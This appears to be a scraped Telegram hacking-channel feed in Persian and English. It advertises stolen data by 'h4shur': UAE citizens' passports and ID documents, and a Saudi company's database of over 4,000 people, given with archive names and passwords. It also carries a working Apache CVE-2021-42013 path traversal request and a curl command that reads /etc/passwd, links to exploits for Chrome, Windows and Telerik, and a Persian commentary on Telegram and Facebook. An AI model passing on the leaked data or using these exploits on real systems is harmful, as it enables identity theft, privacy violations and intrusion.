xml External Entity (XXE) Injection Payload Cheatsheet
-Link : https://hackersonlineclub.com/xml-external-entity-xxe-injection-payload-cheatsheet/
🤤
-Link : https://hackersonlineclub.com/xml-external-entity-xxe-injection-payload-cheatsheet/
🤤
🔖دورف و زاکربرگ
🔍در قطعی شش ساعته فیسبوک، تلگرام بیشترین نفع را با جذب 70میلیون کاربر جدید و افزایش سهام برد و جالب آنکه این هجوم و جوین 70 میلیونی در چندساعت به تلگرام درحالت نرمال باید سرورهای تلگرام را با مشکل مواجه میکرد و این یعنی ظرفیت این کاربران جدید از قبل پیشبینی شده بود.
اکانت های تلگرام هم زمان با قطعی FB شروع به فعالیت و تشویق کاربران به جوین شدن در تلگرام کرد و از این بین موفق به جذب میلیون ها آمریکایی خسته از فیسبوک و واتس آپ شد.
این اتفاق در گذشته به مراتب افتاد و به همین شکل تلگرام میلیون ها کاربر جذب کرد.
جالبه بدونید پاول دورف و مارک زاکربرگ از گذشته رقابت دارند و پاول دورف با تولید شبکه اجتماعی VK که بسیار هم شبیه به فیسبوک بود، شروع کرد و با تلگرام ادامه داد و پاول دورف به زاکربرگ روسیه نیز مشهور است و یکی از اهدف او و تیم تلگرام جذب کاربران واتس آپ و فیسبوک که آمریکایی می باشند نیز هست.
دورف که خود از هکران روسی بوده با جدی گرفتن بحث امنیت در تلگرام، و عدم همکاری با کشور ها برای دراختیار گذاشتن اطلاعات کاربران، توانست مقبولیت لازم و تایید متخصصان را بدست آورد.
دورف در یک افشاگری از جاسوس افزار پگاسوس از شنود تلفنهای همراه توسط این ابزار جاسوسی اسراییلی خبر داد و گفت هیچ راهی برای محافظت در مقابل این ابزار وجود ندارد.
دورف گفته بود از قرار گرفتن شماره اش در لیست جاسوس افزار اسرائيلی پگاسوس که تمام گوشی و تماس ها رو شنود میکند با خبر بوده.
فیسبوک طی این چندسال بزرگ ترین ضربه ها را متحمل شده از افشاگری همکاری با سرویس های امنیتی و تا هک و لو رفتن دیتا و خرابی و قعطی و حملات گسترده و امنیت پاین کاربران.
تمام اینها که تصادفی هم نیست باعث شده کاربران فیسبوک طی هر اتفاق مهاجرتی گسترده به دیگر شبکه ها و تلگرام داشته باشند.
🔍در قطعی شش ساعته فیسبوک، تلگرام بیشترین نفع را با جذب 70میلیون کاربر جدید و افزایش سهام برد و جالب آنکه این هجوم و جوین 70 میلیونی در چندساعت به تلگرام درحالت نرمال باید سرورهای تلگرام را با مشکل مواجه میکرد و این یعنی ظرفیت این کاربران جدید از قبل پیشبینی شده بود.
اکانت های تلگرام هم زمان با قطعی FB شروع به فعالیت و تشویق کاربران به جوین شدن در تلگرام کرد و از این بین موفق به جذب میلیون ها آمریکایی خسته از فیسبوک و واتس آپ شد.
این اتفاق در گذشته به مراتب افتاد و به همین شکل تلگرام میلیون ها کاربر جذب کرد.
جالبه بدونید پاول دورف و مارک زاکربرگ از گذشته رقابت دارند و پاول دورف با تولید شبکه اجتماعی VK که بسیار هم شبیه به فیسبوک بود، شروع کرد و با تلگرام ادامه داد و پاول دورف به زاکربرگ روسیه نیز مشهور است و یکی از اهدف او و تیم تلگرام جذب کاربران واتس آپ و فیسبوک که آمریکایی می باشند نیز هست.
دورف که خود از هکران روسی بوده با جدی گرفتن بحث امنیت در تلگرام، و عدم همکاری با کشور ها برای دراختیار گذاشتن اطلاعات کاربران، توانست مقبولیت لازم و تایید متخصصان را بدست آورد.
دورف در یک افشاگری از جاسوس افزار پگاسوس از شنود تلفنهای همراه توسط این ابزار جاسوسی اسراییلی خبر داد و گفت هیچ راهی برای محافظت در مقابل این ابزار وجود ندارد.
دورف گفته بود از قرار گرفتن شماره اش در لیست جاسوس افزار اسرائيلی پگاسوس که تمام گوشی و تماس ها رو شنود میکند با خبر بوده.
فیسبوک طی این چندسال بزرگ ترین ضربه ها را متحمل شده از افشاگری همکاری با سرویس های امنیتی و تا هک و لو رفتن دیتا و خرابی و قعطی و حملات گسترده و امنیت پاین کاربران.
تمام اینها که تصادفی هم نیست باعث شده کاربران فیسبوک طی هر اتفاق مهاجرتی گسترده به دیگر شبکه ها و تلگرام داشته باشند.
United Arab Emirates was hacked
Part 7 ;
Documents of the people of the United Arab Emirates.
+450 files, including national card, identity card, passport, resume and other documents.
size : 500MB
امارات متحده عربی هک شد.
قسمت ۷ ؛
اسناد مردم امارات متحده عربی.
+450 پرونده شامل کارت ملی ، شناسنامه ، گذرنامه ، رزومه و سایر اسناد.
حجم : 500MB
#h4shur توسط رفیق گلم
Download : 👇👇
@h4shur
@matitanium
Part 7 ;
Documents of the people of the United Arab Emirates.
+450 files, including national card, identity card, passport, resume and other documents.
size : 500MB
امارات متحده عربی هک شد.
قسمت ۷ ؛
اسناد مردم امارات متحده عربی.
+450 پرونده شامل کارت ملی ، شناسنامه ، گذرنامه ، رزومه و سایر اسناد.
حجم : 500MB
#h4shur توسط رفیق گلم
Download : 👇👇
@h4shur
@matitanium
UAE-passport-hacked-h4shur-7.rar
489.9 MB
United Arab Emirates - passport - part 7
password : h4shur
password : h4shur
Documents of the people of the United Arab Emirates.
850 files, including national card, identity card, passport, resume and other documents.
size : 1GB
Long Live Iran
اسناد مردم امارات متحده عربی.
850 پرونده شامل کارت ملی ، شناسنامه ، پاسپورت ، رزومه و سایر اسناد.
حجم : 1GB
زنده باد ایران
DOWNLOAD 👇👇👇
850 files, including national card, identity card, passport, resume and other documents.
size : 1GB
Long Live Iran
اسناد مردم امارات متحده عربی.
850 پرونده شامل کارت ملی ، شناسنامه ، پاسپورت ، رزومه و سایر اسناد.
حجم : 1GB
زنده باد ایران
DOWNLOAD 👇👇👇
UAE-passport-hacked-h4shur-1.rar
493.6 MB
United Arab Emirates - passport - part 1
password : h4shur
password : h4shur
UAE-passport-hacked-h4shur-2.rar
494.6 MB
United Arab Emirates - passport - part 2
password : h4shur
password : h4shur
restnight.com.sa.rar
199 KB
Saudi company Rest night was hacked.
Complete company database and information of more than 4,000 people.
Information includes:
Fax ,Job ,City ,Email ,Fname ,Lname ,Mname ,Phone ,Mobile ,Zipcode ,Date ,Reg type ,Id type ,Creation date ,Id expiration
شرکت رست نایت عربستان سعودی هک شد.
دیتابیس کامل شرکت و اطلاعات بیش از ۴۰۰۰ نفر.
اطلاعات شامل :
Fax ,Job ,City ,Email ,Fname ,Lname ,Mname ,Phone ,Mobile ,Zipcode ,Date ,Reg type ,Id type ,Creation date ,Id expiratio
by #h4shur
Password: h4shur
Complete company database and information of more than 4,000 people.
Information includes:
Fax ,Job ,City ,Email ,Fname ,Lname ,Mname ,Phone ,Mobile ,Zipcode ,Date ,Reg type ,Id type ,Creation date ,Id expiration
شرکت رست نایت عربستان سعودی هک شد.
دیتابیس کامل شرکت و اطلاعات بیش از ۴۰۰۰ نفر.
اطلاعات شامل :
Fax ,Job ,City ,Email ,Fname ,Lname ,Mname ,Phone ,Mobile ,Zipcode ,Date ,Reg type ,Id type ,Creation date ,Id expiratio
by #h4shur
Password: h4shur
This media is not supported in your browser
VIEW IN TELEGRAM
apache HTTP server cgi-bin Path traversal and RCE 😍
cve : (CVE-2021-42013)
GET /cgi-bin/%%32%65%%32%65/.../%%32%65%%32%65/etc/passwd HTTP/1.1
This exploit can bypass for Apache HTTP Server 2.4.50 (CVE-2021-41773 Patch Version)🙂
curl http://(domain)/cgi-bin/%%32%65%%32%65/.../%%32%65%%32%65/etc/passwd
cve : (CVE-2021-42013)
GET /cgi-bin/%%32%65%%32%65/.../%%32%65%%32%65/etc/passwd HTTP/1.1
This exploit can bypass for Apache HTTP Server 2.4.50 (CVE-2021-41773 Patch Version)🙂
curl http://(domain)/cgi-bin/%%32%65%%32%65/.../%%32%65%%32%65/etc/passwd
🕷CVE-2021-30573:Google Chrome 91 Use After Free vulnerability
Version : [91.0.4472.77]
GITHUB : https://github.com/oxctdev/CVE-2021-30573
[HIGH] CVE-2021-30573 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30573
Version : [91.0.4472.77]
GITHUB : https://github.com/oxctdev/CVE-2021-30573
[HIGH] CVE-2021-30573 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30573
⭕️ Exploit for CVE-2021-40449 - Win32k Elevation of Privilege Vulnerability (LPE)
https://github.com/ly4k/CallbackHell
#LPE #windows #cve
https://github.com/ly4k/CallbackHell
#LPE #windows #cve
GitHub
GitHub - ly4k/CallbackHell: Exploit for CVE-2021-40449 - Win32k Elevation of Privilege Vulnerability (LPE)
Exploit for CVE-2021-40449 - Win32k Elevation of Privilege Vulnerability (LPE) - ly4k/CallbackHell
43874.py
11.6 KB
exploit for telerik.web.ui
old
cve : CVE-2017-11317
قدیمی اما کاربردی
old
cve : CVE-2017-11317
قدیمی اما کاربردی
This media is not supported in your browser
VIEW IN TELEGRAM
♣Google Chrome NTP XSS via Google Search CSRF
- Link : https://www.suse.com/security/cve/CVE-2021-37999.html
CVE : CVE-2021-37999
- Link : https://bugs.chromium.org/p/chromium/issues/detail?id=1251541
- Link : https://www.suse.com/security/cve/CVE-2021-37999.html
CVE : CVE-2021-37999
- Link : https://bugs.chromium.org/p/chromium/issues/detail?id=1251541
کتاب آموزش کامل ترموکس.PDF
6.2 MB
کتاب آموزش کامل ترموکس و دستورات لینوکسی با تصویر و مثال
Windows 10 RCE
The exploit is in the link
Link : https://positive.security/blog/ms-officecmd-rce
#RCE
The exploit is in the link
Link : https://positive.security/blog/ms-officecmd-rce
#RCE
positive.security
Windows 10 RCE: The exploit is in the link | Positive Security
Chaining a misconfiguration in IE11/Edge Legacy with an argument injection in a Windows 10/11 default URI handler and a bypass for a previous Electron patch, we developed a drive-by RCE exploit for Windows 10. The main vulnerability in the ms-officecmd URI…